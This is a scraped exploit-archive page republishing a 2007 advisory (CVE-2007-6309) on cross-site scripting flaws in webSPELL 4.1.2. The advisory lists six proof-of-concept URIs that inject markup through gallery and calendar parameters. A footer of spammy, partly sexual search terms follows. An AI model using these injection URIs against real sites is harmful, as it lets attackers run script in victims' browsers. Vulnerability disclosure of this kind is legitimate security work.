exploits , vulnerabilities , articles , webSPELL Usergallery.PHP and Calendar.PHP Multiple Cross-Site Scripting Vulnerabilities
| Title |
webSPELL Usergallery.PHP and Calendar.PHP Multiple Cross-Site Scripting Vulnerabilities |
| Published |
2007-12-10-12:00AM |
| Updated |
2008-01-03-02:10PM |
| Class |
Input Validation Error |
| CVE |
CVE-2007-6309 |
| Remote |
Yes |
| Local |
No |
| Credit |
Brainhead is credited with the discovery of these vulnerabilities. |
| Vulnerable |
webSPELL webSPELL 4.1.2
|
| Not Vulnerable |
|
| Code |
Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI.The following proof-of-concept URIs are available:http://www.example.com/[PATH]/index.php?site=usergallery&action=upload&galleryID=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&upID=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&tag=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&month=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&userID=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&year=">[your code] |
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Thu, 17 Dec 2009 18:26:24 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
googlesexx ms05051 solpot cat /home/ free vieo looking a news for c IceWarp We sexool.com www.sex.20 Based%252B Free.meena maxcpm.inf aish nude WWW.Indian Free.meena W.w.w.xxxm 17gu.com chatma winsrc.dll nescafe.co php-nuke 2 wapforsex. WWW.Sex 30 Pleasopen FormMail Www.sex po sex vdio Kerala sex Google Ear PH PROXY.h smartm www.erotic www.acaibe animal and i...to/idf PDG Shoppi xianhaojie LMS african gi WWW.Sex 30 THRISHA B. animal and Oracle Ora www.bigbla 2.6.11 OpenSSH 3. forumKIT 1 Www.Sexfar ip board 2
|